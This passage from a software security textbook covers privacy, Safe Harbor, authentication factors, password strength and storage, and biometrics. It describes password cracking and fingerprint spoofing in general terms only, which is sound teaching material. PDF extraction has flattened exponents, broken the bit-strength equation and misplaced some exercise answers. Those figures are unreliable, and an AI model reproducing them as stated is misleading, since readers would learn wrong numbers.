unauthorized access to a given contributor’s blog. Describe a detection strategy
to fulfill the administrator’s need.
8 I am worried that students will steal my final exam key which is currently on my
desk in my locked office. Being paranoid, I wish to use every possible anti-
intrusion approach to prevent the test from being taken. What should I do?
208 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
Unit 3: Privacy
Security for Software Engineers | Unit 3: Privacy | Chapter 09: Mitigation | 209
Of the three computer security assurances (C.I.A.), confidentiality is perhaps the
least understood. Many people believe that the need for confidentiality is limited
to those who have something to hide. Criminals need confidentiality so their
plans are not exposed. Liars need confidentiality so their true intent is kept under
cover. It is self-evident why military organizations and spies need confidentiality.
Why would a law-abiding member of society need confidentiality? There are
three main reasons: the law, protection of assets, and protection from
embarrassment.
Law First, privacy standards are often stipulated by law. Many laws govern medical,
academic, and financial records. Laws similarly specify anonymity requirements
for minors and other vulnerable populations. Finally, many institutions set
privacy provisions when interfacing with their assets.
Protection of Second, most citizens have confidential data that, if disclosed, could lead to their
Assets assets being compromised. If my credit card number, social security number, or
location of my hidden house key were revealed, then others would have access
to the assets they protect. It is often difficult to predict the extent a malicious
individual could exploit a seemingly innocuous piece of confidential data.
Protection from Finally, there is a difference between that which is secret and that which is
Embarrassment sacred. In other words, people cannot function normally when their every move
is watched and recorded. For example, though everyone goes to the bathroom
periodically, one would not want a public record of their visits there. This would
be embarrassing.
Need for confidentiality is rooted not in users having things to hide (Solove, 2007),
but rather in individuals having control of their own information (Caloyannides,
2003). An individual retaining control over confidential information is able to
ensure that others cannot use their information against them. So the question
remains: how does one know when a computer system offers sufficient
confidentiality assurances? One answer, and perhaps the most universally agreed
upon answer, is Safe Harbor (Farrell, 2003).
210 | Chapter 09: Mitigation | Unit 3: Privacy | Security for Software Engineers
Defining Privacy
In 1998, the European Commission put into effect a directive on data protection,
prohibiting the transfer of personal data to non-European Union nations failing
to meet a European standard for adequate privacy protection. This standard,
called Safe Harbor, would have prevented U.S. companies from conducting trans-
Atlantic transactions with Safe Harbor compliant companies. As a result, the U.S.
Department of Commerce worked closely with the European Commission to
develop a framework that U.S. companies could follow to ensure compliance with
the EU’s privacy standards. There are seven principles of safe harbor with which
a participating organization must comply. These are data integrity, enforcement,
access, choice, onward transfer, notice, and security (D.E.A.C.O.N.S):
Data integrity refers to the reliability of data collected. The organization should
take steps to ensure that data is complete and accurate. Additionally, the
Data Integrity
organization should ensure that collected data is relevant to the purpose for
which it is being collected.
Choice refers to the organization giving the individual choice. The organization
must allow the individual to opt-out from having personal information disclosed
to a third party or from being used for a purpose other than the original intent.
Choice
For sensitive information, the individual must explicitly opt-in to allow data to be
transferred to a third party or to be used for anything other than the original
purpose for which the data was collected.
Security for Software Engineers | Unit 3: Privacy | Chapter 09: Mitigation | 211
Notice refers to a company’s responsibility to inform individuals about what data
will be collected and how it will be used. This includes notification of what types
of third parties might receive the collected data, as well as what choices and
Notice
methods the individual has for limiting how the organization will use the
collected data. The organization must also provide contact information in case of
inquiries or complaints.
212 | Chapter 09: Mitigation | Unit 3: Privacy | Security for Software Engineers
Chapter 10: Authentication
A critical component to providing the confidentiality assurance is ensuring that the user is who he or she
claims to be. However, there are many ways to do this. The important skill of this chapter is to be able to
choose an appropriate authentication scheme so as to provide confidentiality assurances to the user.
Principal
Applicant Subscriber
Claimant
Figure 10.1: The relationship between a principal, subscriber, applicant, and claimant
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 213
There are several components to the digital identity process:
Agent An agent is a presence on a system. An agent is also known as a digital identity,
an online persona, an account, or even a login. A system can represent an agent
in a variety of ways, from an account ID to ticket (a key representing a single
session on the system).
Credential The artifact a claimant presents to the system to verify that they are a subscriber.
In the simplest case, credentials could be a username and password pair.
It is important to understand that principal is not an agent. Recall that a principal
is a user or set of users. An agent is the user’s presence on the system. An agent
is also distinct from the credentials, though many refer to a given agent by the
credentials they use to access it. Note that there may be more than one principal
tied to a given agent (when more than one person has the authentication
credentials) and one principal may have more than one agent (when a single
person has multiple authentication credentials). There are several processes
involved with the digital identity process:
Authentication Authentication is the process of tying a subscriber to an agent. This occurs when
a claimant presents the system with credentials. The authentication system then
verifies the credentials, activates the corresponding agent, and gives the
subscriber the ability to control the agent.
Verifier The part of the authentication process that verifies if the claimant’s credentials
match what the system expects them to be.
Enrollment Enrollment is the process of an applicant becoming a subscriber. For this to occur,
an agent is created on the system representing the new subscriber. The system
also presents the new subscriber with credentials with which the subscriber with
which the subscriber can authenticate.
Identity Manager The collection of processes and components used to represent digital identities,
handle enrollment, authenticate, and provide similar related services.
To see how these various interactors, components, and processes relate, consider
the following data flow diagram. Notice how the identity manager maintains the
set of credentials necessary to authenticate all the subscribers on the system as
well as represent the system’s digital identities.
credentials
Subscriber authentication
verifier agent
identity manager
Figure 10.2: A simplified identity management system
214 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
The heart of an identity manager is the authentication system. This function
accepts credentials from a claimant and return an agent token. It is with this
token that system interactions are logged and access decisions are made.
What level of assurance should an authentication system provide? This depends
on the value of the assets that the system protects. Some considerations include
the following, in rough order from less severe to most severe:
x Inconvenience. An example might be the ability to renew a library book online
rather than traveling to the local library to perform the same operation manually.
x Distress or damage to reputation. An example of this would be a social media
provider where a subscriber’s online presence represents a significant
component of his or her feeling of well-being.
x Protection of sensitive information. Most of the time, these result in the ability
for an attacker to impersonate a legitimate user.
x Financial loss. Disclosure of a credit card or bank account number would be an
example.
x Civil or criminal violation. An example would be tampering with legal records, or
documents.
x Personal safety. Protection of medical records or specification of medical
procedures often fall in this category.
x Public interests. Tampering with elections, public utilities, or other critical
services potentially impacting the lives of many people.
The larger the impact of an authentication breach, the more careful one must be
in the choice of authentication mechanism, credential distribution, and session
management.
There are three basic types or factors of authentication that may be employed on
a given system: what you have, what you know, and who you are:
What you Have Tie an agent to a principal through possession of some key.
What you Know Tie an agent to a principal through presentation of some information.
Who you Are Tie an agent to a principal through direct measurement of the individual.
A single-factor authentication scheme is one where one mechanism is used to tie
the agent to the principal. An example might be a key to a car or a username /
password combination. Multi-factor authentication, on the other hand, uses
more than mechanism. In most cases, multi-factor authentication involves more
than one type: “have” paired with “know” or “are” paired with “have.” Most
believe that multi-factor authentication is more secure than single-factor because
an attacker would need to use different techniques to defeat each component.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 215
What You Have
“Have” authentication schemes, also known as object-based authentication, tie
principals to entities through a physical token. The underlying assumption of
“have-factor” authentication is that only members of the entity group have
possession of the token.
216 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
Criteria
What-you-have or token-based authentication systems are designed to be easy
to transfer, reliable to validate, inexpensive, and difficult to replicate. These four
criteria are often at odds with each other.
Easy to transfer The easy to transfer criterion is readily achieved by most token-based
authentication schemes because they usually take the form of a physical device.
Most tokens are small, light, and portable. Virtually all the tokens used to
authenticate today have this property: keys, ID cards, smart-cards, and other
tokens. Not all keys follow this rule, of course.
Reliable to validate The reliable to validate criterion is a function of the reliability of the
authentication process of which the token itself plays only part of the role. Car
keys must work 100% of the time or risk leaving the rightful owner of the vehicle
stranded. An example of a common authentication system failing the reliability
goal is a driver’s license. While police officers might be very good at spotting an
in-state counterfeit driver’s license, they will probably be less adept with distant
or rare licenses.
Inexpensive The inexpensive criterion has two components: the cost of the token and the cost
of the validation mechanism. In cases where many individuals need to be
authenticated at a single point, key cost is more important than validation cost.
Consider a factory worker entering a single gate while going to work. With many
keys distributed to many workers, it must be a low-cost key for the
authentication system to work. The opposite is true when a small number of
individuals need to access a large number of secure locations. An example would
be a security guard working in a large petroleum installation. Here it would make
more sense to have an inexpensive lock and a more expensive key. Most token-
based authentication systems have inexpensive keys and a more expensive
validation mechanism. It is interesting to note that some authentication schemes
are designed to be expensive. Items designed to signify rank such as royal crowns
and Native American head-dresses are authentication tokens (signifying who is
in charge).
Difficult to replicate The final criterion is that keys are meant to be difficult or impossible to replicate.
A car or house key fails this test of course. As a result, it is extremely difficult for
the owner of the car or house to be sure that he or she controls all copies of the
keys.
When choosing a “have” authentication scheme, it is important to weight these
criteria with the specific needs of your application. A scenario where convenience
is paramount would prioritize transferability, minimize false-positives, and
minimal expense. On the other hand, a scenario maximizing on security would
prioritize minimizing false-negatives and difficulty to replicate.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 217
Examples
By far the most common token-based authentication is the common key.
However, due their aforementioned weaknesses, they are seldom used for
serious security applications. Two examples of secure token-based
authentication common today are RSA SecurID tokens and smart cards.
Traditional Credit Card Traditional credit cards have a magnetic strip containing authentication
information. They are easy to transfer (hand the card to another principal),
reliable to validate (most card readers have a high success rate), and inexpensive.
However, since the magnetic strip is easily read with a standard card-reader and
are also easy to write, they can be easily replicated. It thus fails the easy to
replicate criterion.
Transponder Chip Car Key Modern cars have a transponder chip embedded in the key. The car will not start
when a matching key is inserted into the ignition unless the chip is present. These
tokens are easy to transfer (hand the key to another principal) and reliable to
validate (it is almost unheard-of for a key to fail to start a car). Unfortunately,
they are expensive. Many companies charge from $50 - $100 to make a new key.
They are difficult to replicate because the act of opening the key to read the chip
also destroys the chip.
RSA SecurID The RSA SecurID is a token containing a small computer that generates a new key
every 30 seconds. When a user wishes to authenticate, he or she types the
password currently displayed on the SecurID screen. For the authentication
process to be completed, the token and the validator must be in sync. SecurID
tokens are designed to resist tampering; opening or otherwise probing the device
causes the device to malfunction thereby destroying the protected key. RSA
SecurID keys meet all the requirements for a good “what-you-have”
authentication mechanism: they are easy to transfer due to their size, relatively
inexpensive (about $50 each), reliable, and difficult to replicate.
Smart Card Smart cards are similar to traditional credit cards or ID cards with the addition of
an embedded chip containing authentication information. The chip is specifically
designed to make tampering or duplication difficult; extracting the chip typically
results in destruction of the chip. Smart cards also meet all the requirements for
a good “what-you-have” authentication mechanism: they are easy to transfer
(they are the size and weight of a standard credit card), inexpensive, reliable, and
difficult to replicate.
As a general rule, what-you-have authentication methodologies are more the
domain of mechanical engineers and computer engineers; unless you work for a
company producing such tokens, it is unlikely that you will ever develop code
specific to such an authentication mechanism. That being said, tokens are
frequently used as part of multi-factor authentication so they are commonly part
of the larger security strategy for a given information system.
218 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
What You Know
“Know” authentication schemes, also known as knowledge-based authentication,
tie principals to entities through possession of knowledge. The underlying
assumption of know-factor authentication is that only members of the entity
group have possession of the knowledge. A common example of “know”
knowledge is a password.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 219
In the simplest implementation, password authentication occurs when a user’s
typed password is compared letter-for-letter against a known expected
password. This implementation is vulnerable to a wide variety of attacks because
the software must store a copy of the expected password. More secure systems
keep only an encrypted copy of the password in memory. The user’s typed
password is then encrypted using the same mechanism. If the two encrypted
versions are identical, then the user is authenticated. Note that the system never
needs to know how to decrypt a password since only encrypted passwords are
compared.
Security of a Password
The security of a password is a function of how many words an uninformed
attacker must attempt before correctly guessing the password. The traditional
way to measure the strength of a password is the bit-strength, given as:
ܾ݅ ݏݐൌ ଶ ሺ݊ ሻ
Figure 10.3: An equation to compute the strength of a password measured in bits.
Here n is the size of the alphabet and m is the length of the password.
For example, assume that a bank allows for a 4 digit PIN number (m=4). This
password has an alphabet size of n=10 (the number of digits possible). The
number of combinations is 10,000 or 104. In order to compute the bit strength,
we need to figure out how many bits are required to represent this number.
Observe that 213 = 8,192 and 214 = 16,384. 10,000 fits in between these numbers.
We take the lower of these two to compute the bit strength (because we would
need a full 16,384 combinations for the password to be a full 14 bits strong).
In contrast the password “aZ4%” has an alphabet size of n=94 (a-z + A-Z + 0-9 +
symbols). The number of combinations is 944 or 78,074,896. Since 226 =
67,108,764 and 227 = 134,217,728, we can see that the complete bit strength of
this password is 26 bits.
Now we will compare the relative size of the PIN password and the password
containing a mixture of numbers, letters, and symbols. The first has 13 bits of
strength and the second has 26 bits. It would be a mistake to think that the text
password is twice as strong seeing it has twice the number of bits. In fact, a 14 bit
password is twice as strong as a 13 bit password. Instead, the text password is 13
bits or 213 times stronger. Since 213 is 8,192, we can see that the text password is
more than eight thousand times stronger!
The time required to crack a password is a function of the size of the search space
and the speed in which guesses can be made. Thus, to strengthen a password
system, two main approaches are permissible: to require stronger passwords (as
measured by the bit-strength), or make guessing more difficult. There are several
strategies to optimize the latter:
220 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
Slow password validation If the authentication system takes a second to validate a password, then much
fewer passwords can be attempted in an hour than a system performing
validation in a microsecond.
Limited number of guesses If the authentication system locks the user out after a small number of attempts,
then only a small part of the search space can be explored.
Exponential validation If the first attempt takes one second, the second two, and the third four, then it
will take an exceedingly long time to make 20 attempts (about two million
seconds or a month). This frustrates brute-force attacks (see below) because it
becomes impractical to try a large number of guesses.
In the worst case, the attacker has access to the encrypted password and can run
through many attempts on a dedicated computer without involving the target
system.
Cracking Passwords
Passwords can be recovered by an attacker in one of three ways: guess the
password based on knowledge of the individual creating the password, trick the
system into disclosing the password, or launch a dictionary attack.
Knowledge The first method, guessing based on knowledge, leverages the fact that humans
do a poor job of generating strong passwords. A list of the most common
passwords was compiled by the Openwall Project.
Disclose The second method, tricking the system to disclosing a password, is a function of
how well the password is protected on the system. If the password exists in an
unencrypted state or if clues to the password’s composition can be gathered by
how attempts are validated, then passwords can be recovered in a very small
number of attempts.
Dictionary Attack The final method, dictionary attack, is the most common password cracking
strategy. It involves trying every possible password one by one. Most dictionary
attacks try passwords in a sorted order with the most likely passwords (typically
the shortest or most common) attempted first. There are many tools (Cain &
Abel, Crack, and others) designed to do this.
When the attacker has access to the encrypted password, more advanced
dictionary attack techniques can be used. One such technique is called a rainbow
table, a pre-computed table representing an entire password dictionary. This
technique is extremely fast, cracking a 14 character alphanumeric password (85
bits) in under 200 seconds. Note that most password authentication schemes do
not allow the attacker to have access to the encrypted table and are thus immune
to such attacks.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 221
Choosing Good Passwords
How can one tell if they have chosen a “good password?” There are two
considerations:
High entropy Chosen from a very large set of possible values. The more random the password
appears, the more difficult it will be for an attacker to guess.
Easy to remember Easy for a real human to remember without resorting to external and insecure
memory aids. If the user needs to write the password down, then it is easy to
steal.
The entropy challenge is a function of making the password look random. If the
password generation scheme is predictable then the entropy is low and it will be
easy to guess. One technique to maximize entropy is to use a random (actually
“pseudo random” is more accurate) number generator to create the password. A
random number generator must uphold one important property: any person with
a full knowledge of and access to the generating system will not be able to predict
the next number in the sequence even if all the previous numbers are known.
Unfortunately, humans are very poor random generators. When ‘randomly'
Pseudo-random
typing a 10-digit number, humans tend to either alternate hands or use only one
number generators are
hand. Robust password generation systems rely on truly random natural
useful for password
phenomena. As these are typically unavailable to the average system, we rely on
generation because
pseudo-random number generators. These include direct measurements of
they are very difficult to
system activity such as process ID, current time, and various performance
guess and all passwords
metrics. Random number generators including these measurements are much
are equally likely to be
more secure than the standard C function rand().
chosen.
The second challenge is to make the password easy for a human to remember. If
a system compels people to use a password that is too difficult to remember,
people commonly respond by writing the password down. Possibly the best way
to get around this constraint is to use a “pass phrase” or similar technique to
maximize this trade-off (Yan, Blackwell, Anderson, & Grant, 2004).
Handling Passwords
Password authentication is extremely easy: use the strcmp() function or one like
it. Password elicitation is also extremely easy. Little more than an edit control is
required. The most challenging part of handling passwords is storing them in such
a way that an attacker cannot obtain it.
If a password is stored in the source code of a program, in a file, in a packet that
is passed over the network, or even in the code segment of memory as the
program is being executed, then the possibility exists that an attacker can find it.
This is much more straight-forward than one might imagine. For example, a
program exists called “strings” which will shift through a file and produce a list
of all text strings contained therein. This produces a very short list of possibilities
in which the real password resides. Clearly a better solution is required. There are
a few general rules of thumb for handling passwords in software:
222 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
High encryption Ensure that passwords in rest or in transit always remain in an encrypted state.
The algorithm used to encrypt the passwords must be robust and the password
must be strong. After all, if a weak password is used to encrypt the sensitive data,
then that becomes the weak link!
Access control Ensure that files holding passwords or processes manipulating passwords are in
the most restricted state possible. Never place passwords in a publicly readable
style. This will give the attacker the opportunity to crack the passwords at his or
her leisure.
Zero memory Immediately after a password has been used, whether in a plaintext or encrypted
state, the memory should be overwritten with zeros. Otherwise attackers can
shift through previously-used memory to find password residues.
Hard-code Never hard-code a password in memory. These are extremely easy to recover.
This is especially true with open source software.
Separate states Avoid keeping an entire password in a single location in memory. Ideally some
parts should be stored in the stack and some in the heap. Only bring the parts
together immediately before use. For example, a buffer overrun may make the
heap portion of memory accessible to the attacker. If the entire password resides
in the heap, then it may be disclosed.
One-way encryption Use a one-way encryption algorithm to store a password so it can never be
recovered. This means that it is possible to encrypt the password, but not
possible to decrypt it. To verify that a given password is authentic, it is necessary
to encrypt the candidate password. This is then compared against the stored
encrypted password. In other words, the stored encrypted password is never
decrypted.
Don't make copies Don't pass a password as a parameter; instead pass a pointer. The more copies
made, the more opportunities exist for one to be found by an attacker.
Because passwords are such a high-value asset, it is best to take extreme
precautions when working with them.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 223
Who You Are
“Are” authentication schemes, also known as identity-based authentication, tie
principals to entities through direct measurements of the individual. The
underlying assumption of “are-factor” authentication is that individuals are
unique enough that a machine can tell the difference. In the era of mobile
devices, “are” authentication has gone from a niche method used in a handful of
special-case scenarios to something the average person uses every day. The most
commonly used “are” measurement today is a fingerprint.
224 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
Who-you-are authentication involves direct measurements of the individual to
identify him or her. Another name for “are” authentication is biometrics, meaning
“a measurement of a living thing.”
A biometric system is essentially a pattern-recognition system that recognizes a
person based on a feature vector derived from a specific physiological or
behavioral characteristic that the person possesses. Depending on the application
context, a biometric system typically operates in one of two modes: verification or
identification.
(Prabhakar, Pankanti, & Jain, 2003)
Properties of Biometrics
For a biometric to serve as an effective authentication mechanism, it must meet
four requirements.
Universality Each individual in the population possesses the characteristic being measured. If,
for example, a valid principal was lacking a finger, then a fingerprint scan would
be an invalid choice. Unfortunately, it is difficult to find a single human
characteristic that is truly universal.
Distinctiveness No two individuals in the population have the exact same form of the
characteristic being measured. This also includes the notion of circumvention, or
how easily the system can be fooled using fraudulent methods. While every two
humans are distinct, it is not always the case that they are distinct enough for a
computer (or, more specifically, a sensor attached to a computer) to tell the
difference.
Permanence The characteristic shouldn't change over time in a given individual.
Unfortunately, every characteristic of every human is in constant flux. It is
therefore necessary to ensure that the range of acceptable variation is
permanent. For example, if a person is 1.9324 meters in height, they might be
1.9321 meters a few moments later depending on how he or she is standing.
Thus a range of 1.9432 +/- 0.004 meters would be the acceptable variation.
Collectability The characteristic is can be readily measured. This often has several components,
including performance (how long it takes to obtain the measurement) and
acceptability (how much objection the human subject will have regarding the
measurement being taken).
It is extremely difficult to find a biometric that meets all four requirements; the
most commonly used biometrics today fall short in one or two categories. Several
biometrics employed in authentications systems today are: fingerprints, eye
scans, voice recognition, face recognition, and a variety of other features that are
unique to a human being.
To implement a biometric authentication mechanism, two functions are required:
enrollment and identification. The first function is the process of gathering data
from a given user. This data will then serve as the key. Of course if an imposter is
able to compromise the enrollment process, the entire authentication
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 225
mechanism is compromised. The second phase is identification, using the same
data gathering mechanism as the enrollment function.
Fingerprints
Fingerprints as a key and fingerprint readers as the lock qualify as “are”
authentication because they meet all three requirements:
Non-transferable Fingerprints of one individual cannot be moved to another.
Non-reproducible Fingers cannot be reproduced.
Human measurement Fingers are parts of human and thus a fingerprint is a measure of a human.
There are several attacks on fingerprint readers which have been proven to be
successful. On the most basic level, an attacker can physically steal the victim’s
hand or finger. This would violate the non-transferable criteria.
Another attack is to carefully map the contours of an individual’s finger and
produce a replica. Some fingerprint readers require a capacitive surface relying
on skin being conductive enough to close an electric circuit. A forged finger with
the correct pattern can accomplish this. One researcher was able to authenticate
on an LG phone by using a hot-glue-gun to make an impression of his finger and
them holding the impression onto his phone.
In 2016, Jan Krissler was able to take a high-resolution picture of Ursula von der
Leyen’s thumb, who was the German minister of defense. With this image, he was
able to print a to-scale impression on a transparent sheet using a “thick toner
setting.” The impression was then affixed to a latex glove and it was able to unlock
the minister’s iPhone. After the demonstration, the minister posed for all future
photographs with her fingers pointed away from the camera.
Jan then demonstrated how a fingerprint impression can be lifted off of a phone
itself assuming the user touched the surface with the authenticated finger.
Given that fingerprint readers are commonly employed as biometrics on phones,
how do they perform as a biometric?
Universality High, but some individuals lack fingerprints. For these people, the patterns on
their hands are still distinct but the indicators typically are not.
Distinctiveness Very high. Some research on the Internet reveals that the odds of two people
having identical fingerprints are 1:64,000,000,000.
Permanence High, though they may be destroyed by accident or intent, fingerprints generally
stay constant throughout an individual’s life.
Collect-ability Very high, though inexpensive devices are not very accurate.
Based on these criteria, one can trust fingerprints for your phone if readers can
do a better job distinguishing human fingers from imitations.
226 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
Facial Recognition
Facial recognition is also commonly used on mobile devices. Does it qualify as an
“are” authentication?
Non-transferable A person’s face cannot be moved to person.
Non-reproducible A person’s face generally cannot be reproduced, though it can be approximated
with plastic surgery.
Human measurement A face is clearly part of a human.
Since facial recognition is clearly a biometric, how does it perform?
Universality Very High, everyone has a face.
Distinctiveness Very High, but a high fidelity image of a face might be needed to tell the
difference between two similar individuals.
Permanence Low. An individual’s face can change appearance through aging, expressions,
makeup, hair style, sun exposure, and cosmetic surgery.
Collectability Very high, though inexpensive devices are not very accurate.
Human Measurement
One interesting class of “who-you-are” authentication involves determining if a
principal is a member of the “human” entity. In other words, the goal is not to
determine if a given individual is part of a group of trusted users, but rather that
the individual is in fact human.
Human Interactive Proofs (HIPs) also known as captchas, are challenges meant
to be easily solved by humans, while remaining too hard to be economically
solved by computers. These are also commonly called captcha tests.
Figure 10.4: An example of Google’s captcha, which had previously been considered to be secure, has been
the type of text a HIPs would compromised by a group in Russia. The attack was accomplished by using a
present to the user
botnet to attempt to crack the HIPs challenges, relying on large numbers of
attempts to overcome low success rates.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 227
Examples
1. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: I knock on the door and my assistant answers through the door
“who is it?” I reply “It is me!”
2. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: I walk into the back room of a pawn shop and am met by a brawny
thug carrying a gun. He tells me to get lost. I reply “Skinny Joe sent me.” He lets
me in.
A Know: Apparently the name “Skinny Joe” is the key word gaining me
admittance. This name can be transferred or duplicated through memorization.
3. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: I walk into my favorite restaurant. The waiter greets me at the
door and directs me to a special table in the back.
4. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: As I begin some high-level negotiations, I offer my hand to shake.
My opponent recognizes the ring I am wearing which identifies me as a member
of his secret society. Based on this association, he gives me some top-secret
information.
A Have: The ring is a token which identifies me. The ring can be transferred but
presumably not easily duplicated.
5. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: Over a game of cards, I let slip a curious turn of phrase which
identifies me as being involved in an event that happened earlier in the week.
228 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
6. Q Design a novel authentication strategy for a mobile phone. There are several
constraints:
x The phone could get lost and we don't want others to use it.
x Authentication must be extremely fast.
x Authentication must be 100% reliable.
x I will be observed while using the phone.
A I will embed a RFID chip in a bracelet or on the band of a watch. There will be a
sensor in the phone which will deactivate it when the distance is greater than a
couple feet, and activate it when the sensor is in range again. This is a form of
“what you have” authentication. It presumably cannot be duplicated but is easy
to transfer.
7. Q Mercedes-Benz has a special key that has no metal and the lock itself has no
moving parts. The car shoots an infrared laser into the key and, depending on
the generated rolling code sent back, determines if the key is authenticated.
Does this key satisfy the requirements for What You Have authentication?
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 229
8. Q My street gang uses tattoos to determine membership. Does this tattoo satisfy
the requirements for what you have authentication?
A There is just one token and that token appears to be a digit. Therefore m = 1
because the length is one, n = 10 because there are ten digits. log2(nm) = log2(101)
= log2(10) = 3 bits.
A There are several ways to answer this. First, m = 8 because there are eight
tokens and n = 42 because there are digits (10) and symbols (32). log2(nm) =
log2(4210) = log2(9,682,651,996,416) = 43 bits. However, the discerning eye
might realize that this is just a phone number. There are 7,919,000 unique
phone numbers for a given area code. This is because the first digit cannot be a
1 or 0. Also the last two digits cannot both be 1. Finally, many “555” numbers
are not used. This yields: log2(7,919,000) = 22 bits (almost 23). Since 43 is larger
than 22, the true bit strength is 22
A These are two Japanese characters. Some research on the Internet reveals that
there are about 85,000 characters, but only 2,136 are taught in school. These
two are of that reduced set. Therefore m = 2 because the length is two, n =
2,136. log2(nm) = log2(2,1362) = log2(4,562,496) = 22 bits.
230 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
12. Q Consider signature as a possible form of biometric. Is it an appropriate form of
who you are authentication? Analyze it according to the four categories.
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 231
Exercises
1 For each of the following, identify the type of authentication used (have, know,
or are):
x Text password
x Fingerprint
x Online credit card authorization
x Credit card in a café
x Biometric
x PIN (Personal Identification Number)
x Token
x Key to my house
x I Learn NetID
x Credit card purchase at a store
x ATM withdrawal
x Your professor
x Signature
3 Recite from memory the two criteria for “have” authentication. For each, give
an example of a have authentication scheme that meets the requirement and
one that fails the requirement.
232 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
6 Please read the following article.
Yan, J., Blackwell, A., Anderson, R., & Grant, A. (2004, September). The
Memorability and Security of Passwords - Some Empirical Results. IEEE Security
and Privacy, 2(5), 25-31.
Based on that article, define each type of attack in your own words:
x Dictionary attack
x Permutation of words and numbers
x User information attack
x Brute force attack
8 Recite and describe the two criteria for good “who you are” authentication
9 According to the four criteria for biometrics enumerated above, classify the
suitability of the following measurements for authentication purposes:
x Footprint
x DNA
x Length of ring finger
x Voice
x Typing characteristics
x Speech patterns such as inflection
x Emotional response to images
Security for Software Engineers | Unit 3: Privacy | Chapter 10: Authentication | 233
Problems
1 Design an authentication strategy for a waitress station where the waitress
enters orders and prints out the bill. There are several constraints:
x She will be observed when she interacts with it.
x Speed is important.
x She has at most one hand.
x It must be difficult for someone to impersonate her.
5 Write a program to first prompt the user for his password. With this string,
determine how many combinations of passwords exist in this set. In other
words, given the length of the password (length of the string) and the
complexity of the password (numbers, letters, and symbols), how large is the
set of passwords represented by the user’s example? Finally, determine the bit
equivalence based on the number of combinations.
8 In 2017, Apple Inc. introduced a new authentication scheme called “Face ID.”
Research this scheme, classify it (Have? Know? Are? Multi-factor?), and evaluate
it according to the criteria presented in the chapter.
234 | Chapter 10: Authentication | Unit 3: Privacy | Security for Software Engineers
Chapter 11: Access Control
The important skill of this chapter is to know how to add access control mechanisms into an existing code
so as to provide confidentiality and integrity assurances on multi-user systems.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 235
To see how this works, imagine three scenarios: a word processor, financial
software, and a music subscription service.
Example: Imagine a single-user system such as a word-processor. As with all editors, this
Word Processor system allows a user to create and view data. Of the three security assurances
(confidentiality, integrity, and availability), only availability is relevant. How can
the system offer confidentiality assurances unless there is another user on the
system from whom the author’s data is to be kept? The same, of course, is true
with integrity. This system thus performs no authentication and as a result makes
no distinction as to what access to data or functionality a given user may have.
Systems such as this have no access control mechanisms.
Example: Now, imagine a slightly more complex system: personal financial software. This
Personal Finance Software program allows the user to enter financial information, create reports, and
interact with financial institutions such as a bank. There are two sets or groups of
users in this scenario: those who are permitted access to the data and those who
are not. It is up to the system to identify which group a given user is a member
of, and it is up to the system to provide a different level of access control
according to this identification. The first requirement is handled by the process
of authentication. Notice how authentication was not required in our single-user
system previously discussed. The second requirement involves a trivial degree of
access control. Based on the outcome of the authentication, the system either
facilitates or denies access to the data. Systems such as these have trivial access
control mechanisms.
Example: Finally, imagine a music subscription service. In this scenario, one user sets up a
Music Subscription Service family account and five related accounts constituting a family membership. The
initial user enters payment information, institutes parental controls, and
identifies the devices to which the streamed music may be played. The rest of the
family is also given a user name and password, but this pertains only to their sub-
account. In other words, they do not have access to the other accounts in the
family membership. This scenario is quite a bit more complex than our previous
two. Here we have multiple users on the system, each having specific and
perhaps unique access to system resources and data. The system must
authenticate each user so as to determine who they are. Based on this
determination, the system must then allow and deny access to various assets
based on a potentially complex policy.
Perhaps the most familiar access control system can be found on a multi-user
operating system. The system allows or denies access to various system resources
based on the outcome of the authentication process. However, all multi-user
software systems have some form of access control in them as well. In other
words, it is not uncommon to have to implement a rudimentary access control
mechanism within a single program. This chapter will present three access control
mechanism which are useful in these scenarios: one offering only confidentiality
assurances, one offering only integrity assurances, and a final mechanism offering
both.
236 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Confidentiality
Many software systems need only to provide confidentiality assurances to the
users: assurances that confidential data will not be disclosed to less trusted
members of the system or to people outside the system. One common example
of this is the military.
Imagine a colonel preparing for a large-scale military campaign during a war.
Clearly, the colonel does not wish the enemy to learn anything of this operation.
However, there are several details that the soldiers in the field need to know
about. The sergeants are privy to more detailed information. Finally, his
lieutenants have access to even more. In order to manage this, a security
clearance system is instituted:
Top Secret The colonel and select members of his staff who need to see the big picture and
are aware of all aspects of the upcoming battle.
Secret The lieutenants and other low-ranking officers. These are they who are given
control of specific operations in the upcoming battle.
Confidential The sergeants who need to organize and coordinate a dozen soldiers.
Public Trust The soldiers on the field. They need to have only a very general understanding
of the campaign.
Unclassified Non-combatants and presumably the enemy. They should know nothing.
All of the military plans are stored on a web site. When a user logs into the system,
they are presented plans for the oncoming campaign based on their level of
access. In other words, everyone with the “Secret” classification are given access
to the same set of plans.
Mathematical Model
Modern security systems must be backed by mathematical models so the degree
of assurances they offer can be established with formal proofs. As computer
systems were being developed in the late 1960’s to store classified information,
